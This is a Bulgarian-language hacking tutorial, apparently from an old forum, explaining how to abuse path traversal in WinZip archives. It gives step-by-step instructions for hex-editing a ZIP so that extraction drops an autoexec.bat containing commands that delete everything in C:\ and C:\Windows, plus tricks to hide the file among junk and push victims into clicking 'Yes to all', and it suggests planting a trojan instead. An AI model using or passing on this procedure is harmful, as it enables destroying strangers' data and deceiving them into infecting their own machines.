Hacking with ZIPs

Здравейте отново малки ученичета,
днес съм ви приготвил нещо много специално. Мисли ли сте, че някога може да бъдете заразен от ZIP файл? Съвсем не се учудвайте...това е напълно възможно, а аз смятам да ви обясня как да го направите по съвсем прост начин
За долната "лекция" ще ви е необходим само WinZip, който предполагам всеки от вас има!

Предполагам, че знаете какво е ZIP файл, затова започвам направо:
Подготовка:
Направете следната структура от директории и файлове:

md c:\arh
echo Hello > c:\arh\file1.txt

Сега създайте нов архив в c:\arh и в него добавете c:\arh\file1.txt

Заб. При добавянето трябва да сте зачертали кутията "Save extra folder info"

Направете следния опит - отворете ZIP файла с шестнадесетичен редактор като HackMan (http://members.tripod.com/techmasters/) и търсете стринг "arh"
И ето...появи се нещо от рода на "arh\file1.txt"

Може би не затопляте за какво правим тези тъпотии до тука, но скоро ще разберете
Както се вижда явно ZIP файловете задават относителен път до архивите. Ако се опитаме да деархивираме файл в C:\DIR1\ , WinZip ще го архивира в C:\DIR1\PATH - PATH е относителния път до файла

Да приемем че като път "успеем" да зададем "..\FILENAME", тогава файла ще се декомпресира в C:\DIR1\..\FILENAME или казано по-просто в основната директория под име FILENAME
Не знам дали разбирате нещо до тука, но се надявам накрая всичко да ви се изясни

Та нека се задълбочим малко повече...да приемем, че този FILENAME е autoexec.bat ,със следните редове:
echo y | del c:\*.*
echo y | del c:\windows\*.*

Хахаха...колко гадно нали :)
Ако не схващате, тези редове ще изтрият всичко от c:\ и c:\windows без да питат потребителя дали иска да го направи :)

И сега идва колуминацията... WinZip явно няма никакви контроли за архивирните файлове следователно ние можем да направим нещо от рода(което всъщност е и цялото хакерство :) ):

Създаваме файл ZZZzzzZZZzzzZZZautoexec.bat

В него записваме двата реда отгоре (echo y | del c:\*.* и echo y | del c:\windows\*.* )

Архивираме файла с WinZip

Отваряме архива с HackMan или друг Hex редактор

Търсим "ZZZzzzZZZzzzZZZ" и го заменяме с "..\..\..\..\..\" (би трябвало да се среща на две места)

Нека сега отворим архива... като път виждаме, че е зададен този, който сложихме отгоре :)

Та сега когато някой деархивира нашия архив, при следващото пускане на компютъра ... какъв компютър? :)))

За съжаление хората, които си имат представа от компютри ще се усъмнят като видят този път и файл autoexec.bat затова можем да натъпчем архива с глупости...например някоя игра с много файлове като по този начин той няма да разбере, че имаме такъв файл :)

Друг проблем е ако файловете не се overwrite-ват автоматично, но и затова си има решение :)
Отворете архива с Hex редактор отново и променете някои имена на вече съществуващи... по този начин ще почнат да се появяват диалогови кутии дали файла да бъде заменен и потребителя ще натисне "Yes to all" като по този начин отново ще бъде заразен

В заключение... както виждате отвсякъде дебнат бъгове, така че бъдете внимателни...дори един ZIP файл може да ви направи поражения каквоти не ще очаквали. Разбира се вместо да трие хард-а можете да направите да се пуска някой троянец, но това го оставам на вас :)))